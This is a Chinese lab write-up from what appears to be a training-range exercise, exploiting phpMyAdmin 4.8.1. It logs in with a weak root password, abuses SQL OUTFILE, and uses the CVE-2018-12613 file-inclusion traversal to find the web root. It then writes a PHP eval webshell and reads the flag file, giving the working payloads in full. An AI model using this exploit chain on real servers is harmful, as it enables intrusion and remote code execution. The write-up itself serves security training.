当前位置:网站首页>墨者学院-phpMyAdmin后台文件包含分析溯源
墨者学院-phpMyAdmin后台文件包含分析溯源
2022-07-04 07:40:00 【Lyswbb】
首先拿到题目到点击访问

访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器
账户密码:root root

点击sql模块 对sql语句进行一个查询

首先查询sql写一句话的权限
我们可以看到他的值为空
secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。
show global VARIABLES like '%secure%' 
继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/
show VARIABLES like 'datadir' 
接下来确认一下mysql权限,可以看到这里是最高权限root
SELECT USER();
权限和绝对路径都有了之后可以直接写入一句话了,先试一下phpinfo
select '<?php phpinfo(); ?>' into outfile '/var/lib/mysql/test.php';当写进去之后访问失败,想了半天才发现这是mysql的路径,不是网站的绝对路径

继续想办法搞到网站的绝对路径 根据题目可知是通过文件包含的方式写一个phpinfo,通过泄漏的绝对路径来shell,思路有了,直接干
首先确定下数据库版本,该版本为4.8.1。在根据数据库版本历史漏洞查询关于文件包含的编号是CVE-2018-12613

直接利用payload进行包含就行了
http://124.70.71.251:40917/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
先写入一个phpinfo进数据库
select '<?php phpinfo();?>'; 
再通过文件包含去调用phpinfo
首先获取session的值,在构造参数去访问phpinfo,获取绝对路径

http://124.70.71.251:45548/index.phpindex.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_[value]
有了绝对路径之后就可以写入webshell了,写入之后直接访问1.php
select "<?php @eval($_POST['cmd']) ?>" into outfile "/var/www/html/1.php";
使用管理工具登陆上去后到根下面直接去找key.txt 或者 find / -name key.txt


边栏推荐
- With excellent strength, wangchain technology, together with IBM and Huawei, has entered the annual contribution list of "super ledger"!
- Zabbix agent主动模式的实现
- User login function: simple but difficult
- Leetcode(215)——数组中的第K个最大元素
- Detailed introduction to the big changes of Xcode 14
- flask-sqlalchemy 循环引用
- [Mori city] random talk on GIS data (I)
- Node foundation ~ node operation
- [Chongqing Guangdong education] National Open University spring 2019 770 real estate appraisal reference questions
- Summary of MySQL common judgment functions!! Have you used it
猜你喜欢

手写简易版flexible.js以及源码分析

In the era of low code development, is it still needed?

Amd RX 7000 Series graphics card product line exposure: two generations of core and process mix and match

window上用.bat文件启动项目

University stage summary

Experience installing VMware esxi 6.7 under VMware Workstation 16

Advanced MySQL: Basics (5-8 Lectures)

Improve the accuracy of 3D reconstruction of complex scenes | segmentation of UAV Remote Sensing Images Based on paddleseg

Oracle-存储过程与函数

博客停更声明
随机推荐
Text processing function sorting in mysql, quick search of collection
[real case] how to deal with the failure of message consumption?
How to write a summary of the work to promote the implementation of OKR?
Unity opens the explorer from the inspector interface, selects and records the file path
PCIe knowledge points -010: where to get PCIe hot plug data
Leetcode(215)——数组中的第K个最大元素
User login function: simple but difficult
2022 - 021arts: début du deuxième semestre
Advanced MySQL: Basics (5-8 Lectures)
L1-028 judging prime number (10 points)
Easy to understand: understand the time series database incluxdb
深入浅出:了解时序数据库 InfluxDB
This article is enough for learning advanced mysql
Zabbix agent主动模式的实现
Leetcode (215) -- the kth largest element in the array
[Mori city] random talk on GIS data (I)
L1-025 positive integer a+b (15 points)
Blue Bridge Cup Quick sort (code completion)
Heap concept in JVM
In the era of low code development, is it still needed?